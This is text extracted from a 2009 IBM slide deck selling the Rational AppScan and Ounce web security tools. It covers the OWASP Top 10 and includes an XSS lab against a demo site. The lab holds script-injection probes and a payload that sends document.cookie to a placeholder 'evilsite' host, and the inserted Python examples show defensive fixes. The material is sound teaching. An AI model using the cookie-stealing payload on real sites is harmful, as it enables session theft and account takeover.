rational appscan & ounce products - ibm - 2009.pdf · 2009-09-17

IBM Software Group © 2007 IBM Corporation. Rational AppScan & Ounce Products. Presenters: Tony Sisson and Frank Sassano. Wednesday, September 16, 2009

Page 2: Rational AppScan & Ounce Products - IBM - 2009.pdf · 2009-09-17 · control, policy, audits Build security testing into the IDE* Application Security Best Practices Automate Security

Discovering the Value of Web Application Security Testing with IBM Rational AppScan© 2009 IBM Corporation

IBM Software Group

The Alarming Truth

• CheckFree: ‘warns 5 million customers after hack’ (http://infosecurity.us/?p=5168, January 9, 2009)

• Hannaford Bros. Grocery Chain: ‘4 million credit & debit cards exposed’ (http://www.cnn.com/2008/US/03/18/retail.data.breach.ap/index.html, March 18, 2008)

• Montgomery Ward: ‘51,000 customer credit card numbers...’ (http://www.scmagazineus.com/Report-Montgomery-Ward-fails-to-alert-victims-of-breach/article/111922/, June 27, 2008)

• Target Stores: ‘Blind users win $6M suit; Target to make website accessible’ (http://digg.com/tech_news/Blind_Users_Win_6M_Suit_Target_To_Make_Website_Accessible, 2008)


Bad Press Decreases Shareholder Value

One-day market cap drop of $200M

The Reality: Security and Focus Are Unbalanced

Web Applications: 75% of attacks, 10% of security spending

Network Server: 25% of attacks, 90% of security spending

75% of all attacks on information security are directed to the web application layer

2/3 of all web applications are vulnerable


The Myth: “Our Site Is Safe”

• We have firewalls in place

• We use network vulnerability scanners

• We audit it once a quarter with pen testers


High Level Web Application Architecture Review

Client Tier (Browser) → Internet → Firewall → Middle Tier: App Server (Presentation, Business Logic) → Data Tier: Database

SSL protects the transport; the firewall protects the network

The customer app is deployed on the App Server (Middle Tier); sensitive data is stored in the Database (Data Tier)

Network Defenses for Web Applications

An HTTP request passes the Perimeter Firewall, the IDS (Intrusion Detection System), the IPS (Intrusion Prevention System) and the Application Firewall (App Firewall), with a System Incident Event Management (SIEM) system collecting security events

These defenses are designed to “fail securely” by allowing through traffic that they don't understand

Security Testing Technologies Primer

Static Code Analysis = Whitebox

- Looking at the code for security issues (code-level scanning)

Dynamic Analysis = Blackbox

- Sending tests to a functioning application

(Diagram: the total potential security issues, with Dynamic Analysis and Static Analysis each covering a different portion)

Building Security & Compliance into the Software Development Lifecycle (SDLC)

Coding → Build → QA → Security → Production

• Enable Security to effectively drive remediation into development

• Provides developers and testers with expertise on detection and remediation ability

• Ensure vulnerabilities are addressed before applications are put into production

Rational AppScan End-to-End Web Application Security

Lifecycle: REQUIREMENTS → CODE → BUILD → QA → SECURITY → PRODUCTION

Security for the development lifecycle:

• Req’ts Definition (security templates): security requirements defined before design & implementation

• Ounce Products - Eclipse/VS IDE: build security testing into the IDE*; address security from the start

• Automate Security / Compliance testing in the Build Process

• AppScan Tester (scan agent & clients): security / compliance testing incorporated into testing & remediation workflows

Security audit solutions for IT Security:

• AppScan Standard (desktop)

• AppScan Enterprise / Reporting Console (enterprise-wide scanning and reporting): Security & Compliance testing, oversight, control, policy, audits

• AppScan OnDemand (SaaS): outsourced testing for security audits & production site monitoring

Application Security Best Practices span the whole lifecycle

Open Web Application Security Project (OWASP) Top 10

Application Threat | Negative Impact | Example Impact

Cross-Site Scripting | Identity theft, sensitive information leakage, … | Hackers can impersonate legitimate users, and control their accounts.

Injection Flaws | Attacker can manipulate queries to the DB / LDAP / other system | Hackers can access backend database information, alter it or steal it.

Malicious File Execution | Execute shell commands on server, up to full control | Site modified to transfer all interactions to the hacker.

Insecure Direct Object Reference | Attacker can access sensitive files and resources | Web application returns contents of sensitive file (instead of harmless one)

Cross-Site Request Forgery | Attacker can invoke “blind” actions on Web applications, impersonating a trusted user | Blind requests to bank account transfer money to hacker

Information Leakage and Improper Error Handling | Attackers can gain detailed system information | Malicious system reconnaissance may assist in developing further attacks

Broken Authentication & Session Management | Session tokens not guarded or invalidated properly | Hacker can “force” session token on victim; session tokens can be stolen after logout

Insecure Cryptographic Storage | Weak encryption techniques may lead to broken encryption | Confidential information (SSN, credit cards) can be decrypted by malicious users

Insecure Communications | Sensitive info sent unencrypted over insecure channel | Unencrypted credentials “sniffed” and used by hacker to impersonate user

Failure to Restrict URL Access | Hacker can access unauthorized resources | Hacker can forcefully browse and access a page past the login page


Cross-Site Scripting – The Exploit Process

Actors: User, bank.com, Evil.org

1) Link to bank.com sent to user via e-mail or HTTP

2) User sends script embedded as data

3) Script/data returned, executed by browser

4) Script sends user’s cookie and session information without the user’s consent or knowledge

5) Evil.org uses stolen session information to impersonate user

Lab 1: Profile Web Application, Steal Cookies

The goal of this lab is to: profile the demo.testfire.net application; utilize a Cross-Site Scripting vulnerability on the demo.testfire.net application in order to access cookies on a target user’s browser

Search inputs: Super Bowl · <B>Super Bowl</B> · <script>alert(1)</script> · <script>alert(document.cookie)</script>

Tamperdata - for gathering the Cookie information to send to Grandma!

– SEARCH - <script>document.write('<img src=http://evilsite/'+document.cookie);</script>
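As an added example (not part of the IBM deck), the reflected search page from Lab 1 in two forms: the vulnerable version that echoes the term verbatim, and a hardened version that entity-encodes it and marks the session cookie HttpOnly so step 4 of the exploit process has nothing to read. The page template, the cookie name and the helper names are constructed for this illustration.

```python
import html
import re
from http.cookies import SimpleCookie

# Constructed sample input: the four search terms tried in Lab 1.
LAB_SEARCH_TERMS = [
    "Super Bowl",
    "<B>Super Bowl</B>",
    "<script>alert(1)</script>",
    "<script>alert(document.cookie)</script>",
]


def render_search_vulnerable(term: str) -> str:
    """Reflects the search term into the HTML verbatim.  This is the defect the
    lab exercises: data sent in step 2 of the exploit process comes back as
    markup in step 3 and the browser executes it."""
    return f"<html><body><p>You searched for: {term}</p></body></html>"


def render_search_hardened(term: str) -> str:
    """Same page, with the term entity-encoded for an HTML text context.
    '<' becomes '&lt;', so the browser shows the payload instead of running it."""
    return f"<html><body><p>You searched for: {html.escape(term, quote=True)}</p></body></html>"


_SCRIPT_OPEN = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script(page: str) -> bool:
    """Does the response body still carry a raw <script> opening tag?  A DAST
    scanner (AppScan in this deck) decides the same way: send the probe, then
    look for it reflected unencoded in the response."""
    return _SCRIPT_OPEN.search(page) is not None


def audit_lab_terms() -> dict:
    """Runs every Lab 1 term through both renderers.  Returns
    {term: (vulnerable_reflects_script, hardened_reflects_script)}."""
    return {
        term: (
            contains_live_script(render_search_vulnerable(term)),
            contains_live_script(render_search_hardened(term)),
        )
        for term in LAB_SEARCH_TERMS
    }


def session_cookie_header(token: str, hardened: bool) -> str:
    """Builds the Set-Cookie line for the session token (cookie name is
    constructed).  With hardened=True it is HttpOnly, so document.cookie
    cannot read it and step 4 has nothing to send, and Secure, so it only
    travels over the SSL-protected transport from the architecture slide."""
    cookie = SimpleCookie()
    cookie["SESSIONID"] = token
    if hardened:
        cookie["SESSIONID"]["httponly"] = True
        cookie["SESSIONID"]["secure"] = True
    return cookie.output(header="Set-Cookie:").strip()


def cookie_flags(header: str) -> set:
    """Parses a Set-Cookie line back into the set of attribute flags it carries."""
    attributes = header.split(":", 1)[1].split(";")[1:]
    return {a.strip().lower() for a in attributes}


if __name__ == "__main__":
    for term, (vuln, hard) in audit_lab_terms().items():
        print(f"{term!r}: vulnerable reflects script={vuln}, hardened={hard}")
    print(session_cookie_header("constructed-token", hardened=True))
```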

SQL Injection Example

SQL Injection Example - Exploit

SQL Injection Example - Outcome

(screenshot slides)

Information Leakage – Different User/Pass Error

Verbose login error messages

Failure to Restrict URL Access - Admin User Login / Privilege Escalation Example

/admin/admin.aspx

Forcefully browse to admin page
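Added example, not from the deck, covering the two slides above: the verbose login error that tells the caller which half of the credentials was wrong, beside a uniform-message version, and a server-side authorization check that applies to /admin/admin.aspx no matter how the URL was reached. The user store, salt, role names and function names are constructed for this illustration.

```python
import hashlib
import hmac
import posixpath

# Constructed user store: salted PBKDF2 hashes and a role per account.
_SALT = b"constructed-demo-salt"          # real code uses a random salt per user
_ITERATIONS = 20_000                        # kept low so the example runs quickly


def _hash_password(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, _ITERATIONS)


USERS = {
    "jsmith": {"hash": _hash_password("demo1234"), "role": "user"},
    "admin": {"hash": _hash_password("constructed-admin-pw"), "role": "admin"},
}
_DUMMY_HASH = _hash_password("")            # compared against when the user is unknown
LOGIN_FAILED = "Login failed: invalid username or password."


def login_verbose(username: str, password: str):
    """The 'different user/pass error' on the slide: separate messages reveal
    whether the username exists, which turns the login form into an account
    enumeration oracle.  Returns (role or None, message)."""
    user = USERS.get(username)
    if user is None:
        return None, "Login failed: unknown user."
    if not hmac.compare_digest(user["hash"], _hash_password(password)):
        return None, "Login failed: wrong password."
    return user["role"], "ok"


def login_uniform(username: str, password: str):
    """Same credential check, one failure message.  A hash comparison is done
    even for unknown users so the response time does not leak what the
    message no longer says."""
    user = USERS.get(username)
    stored = user["hash"] if user is not None else _DUMMY_HASH
    matched = hmac.compare_digest(stored, _hash_password(password))
    if user is None or not matched:
        return None, LOGIN_FAILED
    return user["role"], "ok"


# Failure to Restrict URL Access: which role a path prefix requires.  The deck's
# example is forcefully browsing to /admin/admin.aspx.
PROTECTED_PREFIXES = {"/admin/": "admin"}


def normalize_path(path: str) -> str:
    """Collapse '.' and '..' segments and fold case (IIS paths such as
    admin.aspx are case-insensitive) before the rule lookup, so spelling
    variants of the URL cannot slip past the prefix match."""
    return posixpath.normpath("/" + path.lstrip("/")).lower()


def authorize(path: str, session_role):
    """Server-side check that runs on every request.  Leaving the admin page
    out of the menu is not access control; the role in the session is."""
    normalized = normalize_path(path)
    for prefix, required_role in PROTECTED_PREFIXES.items():
        if normalized == prefix.rstrip("/") or normalized.startswith(prefix):
            return session_role == required_role
    return True


if __name__ == "__main__":
    role, _ = login_uniform("jsmith", "demo1234")
    print("jsmith may open /admin/admin.aspx:", authorize("/admin/admin.aspx", role))
```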


IBM Software Group | Rational - IBM Confidential

AppScan’s HTTP-Based Malware Scanning

1. Discover all content and links in a Web Application

– Execute JavaScript & Flash

– Fill forms and login sequences

– Analyze secure pages

– …

2. Analyze all content for malicious behavior indicators

3. Compare all links to comprehensive black-lists


Introducing expanded Rational AppScan OnDemand

AppScan/Policy Tester OnDemand:

• Comprehensive testing of pre-production applications

• Periodic assessment of applications in QA or Security

• Monthly scans

• Flexible offerings (Small/Medium/Large)

AppScan Tester OnDemand Production Site Monitoring:

• Continuous scanning of production Web sites for vulnerabilities that may have been introduced after the app went live

• Dynamic or interactive content and forms, online registrations

• Weekly scans

The Result: Ability to address online risk without in-house resources, with the faster route to actionable information


© 2008 IBM Corporation - IBM Software Group | Watchfire Solutions / Rational software

The Impact of Securing Flash-based Applications

• Flash: one of the fastest growing security problems; practically in every web application

• Flash vulnerabilities: Cross-Site Flashing, Cross-Site Scripting through Flash, Phishing, Flow Manipulation

• Flex: “Next-Generation” of Flash

• A “Marketing” Flash banner compromises the entire web application
